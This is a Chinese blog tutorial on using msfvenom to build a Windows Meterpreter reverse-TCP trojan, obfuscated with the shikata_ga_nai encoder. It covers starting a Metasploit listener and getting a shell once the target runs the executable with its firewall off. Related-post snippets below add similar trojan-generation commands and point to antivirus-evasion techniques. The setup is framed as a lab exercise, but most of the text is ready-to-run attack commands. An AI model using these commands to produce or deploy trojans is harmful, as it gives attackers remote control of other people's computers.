利用msf工具制作反向木马渗透

最新推荐文章于 2025-03-09 16:09:25 发布
最新推荐文章于 2025-03-09 16:09:25 发布
阅读量385 收藏 5
点赞数 7
文章标签: 网络安全 安全 系统安全 web安全 安全架构 计算机网络 网络攻击模型
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_61415450/article/details/138316591
版权
本文讲述了在KaliLinux上通过msfvenom生成WindowsMeterpreter反向连接木马,以及在目标机上执行的详细过程,包括环境配置和实际操作步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

概念概述


反向指攻击者的机器打开一个端口,目标机器运行反向payload来连接攻击机器的端口,从而建立连接

msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,配合meterpreter在本地监听上线。

环境准备


攻击机:kali IP:192.168.200.147

靶机:window11/10

在进行实验前,需要关闭靶机的防火墙;关闭防火墙的目的是让靶机放行进站入站的流量

实战

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.200.147 LPORT=4021 -e x86/shikata_ga_nai -f exe -o /home/kali/muma.exe

注释:

生成木马于/home/kali 目录下

windows/meterpreter/reverse_tcp :生成window 平台木马,需要尝试别的平台的小伙伴可以自行百度

192.168.200.147 : 为攻击机的IP,用来监听。

4021:自设置端口,要注意的是不要被其他的服务占用。

msfconsole 进入msf控制台

use exploit/multi/handler 使用模板

show payloads    查看配置

set lhost 192.168.200.147   本机监听IP    (这里改为你自己的ip)

set lport 4021     监听端口

run  运行

(此时监听端口已开启,放在一边,我们去搞事情)

随后把木马文件从目录中找出来,放进靶机。

右击以管理员运行exe文件,不出意外就成功啦

进入shell窗口后我们可以对靶机做一系列的实验,感兴趣的话可以自行百度

弑月灼红
关注
网络安全MSF生成木马教程
一直被模仿,从未被超越
03-13 2189
1、当客户端点击木马后,Kali 成功获取。2、启动Apache,方便客户端下载。1、在Kali机器上面生成木马。本例用的是 Themida。二、Kali 开启监听。2、设置Payload。
msf渗透练习-生成木马控制window系统
weixin_49349476的博客
06-12 5146
利用kali的msf工具生成木马window木马,对目标window主机进行控制,本次练习仅用于学习,不要用于非法用途(做个好白帽)
Python网络安全项目开发实战_潜伏与Python反向连接_编程案例解析实例详解课程教程.pdf
04-27
对黑客来说,最重要的是什么?个人认为不是高超的攻击破解技术,而是隐身的能力。所以黑客攻击不一定凌厉,但是管理员的防守是一定要严密的。黑客在网络攻击结束后,会清扫数字足迹。不管是 Windows 还是 Linux 都会一一记载登录用户的操作痕迹和连接的次数(不论是成功的连接还是不成功的连接)。如果想悄悄地来又悄悄地去,不留下一片云彩,就要小心地擦除自己的足迹,修改记录日志。作为管理员,在查看日志时可以先检查一下日志的时间戳,如果发现异常就需要仔细检查系统了。如果有条件,可以远程备份下日志。这样即使日志文件被修改了,也有机会找到线索。
反向连接木马测试源程序
06-26
本程序利用winsockAPI函数在vc下编程,监听对方主机某一指定端口,当对方主机尝试打开该端口即达到连接目的。不具有破坏性,只演示了winsock的使用,提供思路。
木马免杀之MSFVenom制作木马
没有网络安全就没有国家安全
03-09 1632
木马免杀之MSFVenom制作木马
msf生成简单木马
qq_44881113的博客
09-04 368
windows 木马 msfvenom -p windows/meterpreter/reverse_http lhost=192.168.1.128 lport=6666 SessionCommunicationTimeout=0 SessionExpirationTimeout=0 -f exe>shell.exe 监听 msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_http s
msf生成木马
qq_44657899的博客
04-03 4366
Windows: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.110 LPORT=4444 -f exe -o 123.exe msfvenom -p windows/meterpreter/bind_tcp LPORT=<Attack Port> -f dll >/root/bind_xx.dll msfvenom -p windows/x64/meterpreter/reverse_tcp_rc4 LHOST
Metasploit(msf)木马生成
m0_58713554的博客
11-04 370
msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击端ip LPORT=1234 -f exe > /root/新建文件的文件名.exe 2 ls 查看是否创建出了该文件 3 然后进入msfconsole进行监听 4 use exploit/multi/handler 进入监听模式 5 set PAYLOAD set LHOST攻击机ip set LPORT 配置参数 6 run 运行 7 把刚...
weevely生成木马反向shell连接msf
小刚的博客
05-13 4341
作者:小刚 一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢 本实验仅用于信息防御教学,切勿用于它用途 weevely实验环境weevely介绍使用流程1,使用weevely生成php木马文件2,将木马文件上传到被攻击web服务器3,使用weevely连接木马文件4,控制参数5,反向shell连接msf总结 今天使用一下kali系统下的中国菜刀weevely,生成木马文件、混淆木马文件控制Web服务器,并进一步反弹shell给metasploit做进一步控制。 实验环境 VM搭建的虚拟测试环境 1.p.
内网渗透day4--隧道技术和正反向木马绕过内网主机防火墙
qq_52227682的博客
11-21 677
小迪安全内网渗透
kali如何远程连接靶机数据库执行msf制作木马
最新发布
04-03
然后,结合这两个步骤,用户可能想通过数据库上传木马,或者利用数据库的漏洞执行命令来触发木马。例如,如果数据库有写权限,可以将木马文件路径插入到某个表中,或者利用UDF(用户定义函数)执行系统命令。这部分...
MsfVenom制作木马
weixin_58666006的博客
09-02 1214
p, --payload 指定需要使用的payload。使用自定义的payload,请使用-;或者stdin指定-l, --list 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all-n, --nopsled 为payload预先指定一个NOP滑动长度-f, --format 指定输出格式-e, --encoder 指定需要使用的编码器,如xor等。
MSF生成windows木马
lenkee的博客
10-22 2万+
msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线 生成exe木马 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.110 LPORT=4444 -f exe -o 123.exe 192.168.0.110是攻...
渗透测试教学之MSF生成木马
weixin_45109326的博客
08-20 4806
msfvenom是msf中的一个独立的负载生成器,它可以利用msf中的payloads和encoders来生成各种格式的木马文件,并在目标机上执行,配合meterpreter在本地监听上线。msfvenom是msfpayload和msfencode的结合体,可以一步完成负载生成和编码免杀的操作。
MSF生成木马木马的简单使用
爱喝水的仙人树的博客
11-03 9950
本文将介绍有关MSF木马模块的简单使用方式,介绍常见的几种木马生成方式,如有不对的地方,欢迎大家在评论区指正。由于本文仅对部分模块的简单使用进行说明,更多信息请参考官方网址MSFVENOM环境配置说明1. 使用kali虚拟机和Win7(可以低于此版本)虚拟机2. kali虚拟机建议使用最新版本并将系统软件更新至最新版本3. Win7虚拟机务必关闭网络防火墙,不建议使用Win7及以上版本系统,简单的木马会被直接删除4. 查看两台虚拟机的IP地址,确保两台虚拟机之间可以ping通。
利用msfvenom制作木马程序(不免杀)
Nanyeer的博客
03-29 1754
制作木马程序进行远程控制(不免杀)
【内网安全】——msf木马生成教程
Demo不是emo的博客
01-30 6019
msfvenom生成木马教程
msf-Msfvenonm生成后门木马
热门推荐
weixin_45588247的博客
08-27 2万+
msf-Msfvenonm生成后门木马实验 文章目录msf-Msfvenonm生成后门木马实验一、工具:二、实验环境:三、`msfvenom`简介:四、各平台生成木马的方法:五、生成反向反弹木马:1. windows平台:1.1 生成反弹木马:1.2 捆绑一个程序伪装木马:2. :3. :4. :1.1 :2.1 :五、实验过程:1. :1.1 :1.1.1 : 一、工具: Metasploit Framework(MSF)漏洞利用框架 二、实验环境: 靶   机: windows10虚拟机:192.
kali渗透-msf木马免杀技术
02-07
### Kali Linux 中 Metasploit Framework 实现木马免杀技术 #### 使用 Msfvenom 工具生成并处理 Payloads Msfvenom 是一款强大的工具,它不仅能够创建恶意负载(payload),还提供了多种编码选项用于混淆这些 ...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值